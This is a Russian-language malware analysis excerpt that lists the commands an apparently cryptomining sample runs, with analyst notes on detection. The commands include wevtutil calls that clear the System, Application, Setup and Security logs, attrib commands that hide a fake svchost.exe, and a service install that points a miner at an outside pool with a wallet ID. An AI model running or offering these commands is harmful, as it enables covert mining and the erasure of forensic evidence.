Техническая информация
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\tem.vbs"
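- '<SYSTEM32>\cmd.exe' /c wevtutil cl system
  (Примечание: эта и аналогичные команды wevtutil cl ниже очищают журналы событий System, Application, Setup и Security, то есть удаляют следы предшествующей активности. Сама очистка оставляет запись: событие 1102 в журнале Security и событие 104 в журнале System, по которым её можно обнаружить.)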
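- '<SYSTEM32>\attrib.exe' +s +h +r %WINDIR%\Media\svchost.exe
  (Примечание: атрибуты +s +h +r помечают файл как системный, скрытый и доступный только для чтения, поэтому при настройках Проводника по умолчанию он не отображается; увидеть такие файлы можно командой dir /a.)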
- '<SYSTEM32>\cmd.exe' /c wevtutil cl application
- '<SYSTEM32>\attrib.exe' +s +h +r %WINDIR%\Media\Systen.exe
- '<SYSTEM32>\cmd.exe' /c wevtutil.exe cl Setup
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\Media\svchost.exe start WindowsMedia
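- '<SYSTEM32>\cmd.exe' /c %WINDIR%\Media\svchost.exe install WindowsMedia Systen.exe -o bcc.appel86.org:7777 -u 496ogd9qnnc6Hs2KADUZNGFB3BbVVSCEw3FQgrQJN3DrfcvZkMf4sVt8xagLsGK4HkZzGMGgc2WmMQwCAi8Xtqzi6G9vWpN -t 1
  (Примечание: %WINDIR%\Media\svchost.exe — не системный svchost.exe, который находится в <SYSTEM32>. Судя по синтаксису install/start, этот файл используется как оболочка для регистрации и запуска службы WindowsMedia, которая выполняет Systen.exe. Параметры -o, -u и -t похожи на опции майнера (адрес пула, кошелёк или имя пользователя, число потоков), но по одному этому списку это не подтверждается.)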
- '<SYSTEM32>\cmd.exe' /c @attrib +s +h +r %WINDIR%\Media\svchost.exe
- '<SYSTEM32>\cmd.exe' /c wevtutil cl security
- '<SYSTEM32>\cmd.exe' /c @attrib +s +h +r %WINDIR%\Media\Systen.exe
- <Текущая директория>\tem.vbs
- %WINDIR%\Media\Systen.exe
- %WINDIR%\Media\svchost.exe
- %WINDIR%\Media\Systen.exe
- <Текущая директория>\tem.vbs
- %WINDIR%\Media\svchost.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''